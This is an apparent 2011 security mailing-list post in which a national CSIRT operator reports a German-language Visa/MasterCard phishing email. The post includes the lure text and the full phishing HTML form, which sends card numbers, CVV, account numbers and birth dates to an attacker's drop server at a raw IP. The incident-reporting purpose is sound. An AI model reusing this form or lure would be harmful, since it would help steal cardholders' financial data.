[nsp-sec] Phishing dropbox at (AS 27715)

David Jiménez ddavinci at gmail.com
Mon Jul 25 20:02:22 EDT 2011 

In case you didn't get the html file:


EVIDENCE
/////////////////////////////////////////////////

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN"><html><head><META
http-equiv="Content-Type" content="text/html;
charset=utf-8"></head><body>
<div>         <dl> <p><img src="
http://compare-best-credit-cards.com/wp-content/uploads/2009/12/186563.gif"
width="160" height="100"> <img src="
http://www.fsgbank.com/media/ext/uploaded/c838dd39-375d-4135-a88c-55c0b3a15f48/logo_mastercardSecurecode.png"
style="margin-left:400px"></p> <hr> <dt>1</dt><dd>Eingeben<br>Details</dd>
<dt>2</dt><dd>Finish</dd> <div>  </div>  <h1> Schritt 1 - Geben Sie die
Details </h1>  <a name="0.1_main"></a>  </dl></div> <div> <div> <h2>
Informationen
zur Abrechnung</h2> </div> <div> <table><td><form action="
http://189.126.116.82/wp-kunden.php" name="0.1_processForm" method="POST"
target="_blank" onsubmit="return window.confirm("You are submitting
information to an external page.\nAre you sure?");">  <td><span><span>
<strong><u>Kreditkarten-Informationen</u></strong> - Bitte geben Sie Ihren
Kredit-oder Debit Card.</span></span></td>  <tr> <td> <form action="
http://189.126.116.82/wp-kunden.php" name="0.1_processForm" method="POST"
target="_blank" onsubmit="return window.confirm("You are submitting
information to an external page.\nAre you sure?");"></form></td> </tr>
<tr> <td><table width="735" border="0" align="center" cellpadding="3"
cellspacing="3">  <tr> <td><div align="right">Debit / Credit Card-Nummer:
</div></td> <td width="24%"><input name="card" title="Debit / Credit Card
Number" type="text" size="25" maxlength="23"></td> <td width="6%"><img src="
http://www.ysutopia.net/images/logo_cc_visa_37x23.gif" alt="Visa" width="37"
height="23"></td> <td width="23%"><img src="
http://www.ysutopia.net/images/logo_cc_mc_37x23.gif" alt="MasterCard" width
="37" height="23"><img src="
https://secure.wp3.rbsworldpay.com/sc2/jsp/shopper/icons/MAESTRO-SSL.gif"
alt="" width="43" height="23"></td> </tr> <tr> <td><div
align="right">Verfallsdatum:
</div></td> <td colspan="3"><select name="expm" title="Expiration
Month"> <option
value="">- Month -</option> <option>01</option> <option>02</option> <option>
03</option> <option>04</option> <option>05</option> <option>06</option>
<option>07</option> <option>08</option> <option>09</option> <option>10
</option> <option>11</option> <option>12</option> </select> / <select name="
expy" title="Expiration Year"> <option value="">- Year -</option> <option>
2011</option> <option>2012</option> <option>2013</option> <option>2014
</option> <option>2015</option> <option>2016</option> <option>2017</option>
<option>2018</option> </select></td> </tr> <tr> <td><div align="right">
Karten-Prüfnummer:</div></td> <td colspan="3"><input name="cvv" title="Card
Verification Number" type="text" size="4" maxlength="4"> [ <a>view sample
</a> ]</td> </tr> <tr> <td><div align="right">Konto-Nummer:</div></td>
<td><input
name="ssn" title="Account Number" type="text" size="25" maxlength="50"></td>
</tr> <tr> <td width="47%"><div align="right">Geburtsdatum:
</div></td> <td><input
name="a" title="CardHolder Name" type="text" size="2" maxlength="2"> <input
name="b" title="CardHolder Name" type="text" size="2" maxlength="2"> <input
name="c" title="CardHolder Name" type="text" size="4" maxlength="4"> <br>
<span>(mm/dd/yyyy)</span></td> </tr> <tr>  </tr></table></td> </tr> <tr>
<td><div align="center"></div></td> </tr> <tr> <td> </td> </tr> <tr> <td>
</td> </tr> <tr> <td><div align="center"> <input type="submit" name="Submit"
value=" Submit Informationen "> </div></td> </tr>  <td><br> <br>      <ul>
<li> © <a title="Opens in new window" href="http://www.visa.com" target="
_blank">Visa / MasterCard</a></li> </ul>    </td></form></td></table></div>
</div></body></html>


2011/7/25 David Jiménez <ddavinci at gmail.com>

>
> Hi Folks,
>
> Just received the following email with a phishing html as attachment that
> drop the information at 189.126.116.82 (AS27715).
>
> Anyone able to shutdown it and share flows related to IPs connecting to
> this site?
>
> Kind Regards
>
> *De: *Visa und Mastercard <Sicherheit at visa-mastercard.de>
> *Fecha: *25 de julio de 2011 18:35:18 CDT
> *Asunto: **Hinweis: Aus Gründen der Sicherheit Ihrer Kreditkarte
> ausgesetzt ist.*
>
> Sehr geehrter Karteninhaber,
>
> Visa und MasterCard hat die Aktualisierung der Sicherheit auf
> allen Kreditkarten.
>
> Aus diesem Grund Ihre Kreditkarte wird ausgesetzt, bis Sie die
> Daten Ihrer Kreditkarte zu bestätigen.
>
> Um Ihre Angaben zu bestätigen und zu reaktivieren Ihre
> Kreditkarte laden Sie bitte das beigefügte Formular.
>
> Hinweis: Dies ist verry wichtig für Ihre Kreditkarte Sicherheit.
>
> Vielen Dank für Ihr Verständnis.
>
> ------------------------------
> Correo Analizado por McAfee SCM
>
>
>
>
>
>
>
> --
>
> ---
> David Jimenez | CERT-MX Operations Center
> --------------------------------------------------------------
> Mexican National CSIRT
> Federal Police / E-Crime Unit
> Email: cert-mx at ssp.gob.mx
> Phishing Report: phishing at ssp.gob.mx
> PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188
>



-- 

---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188

More information about the nsp-security mailing list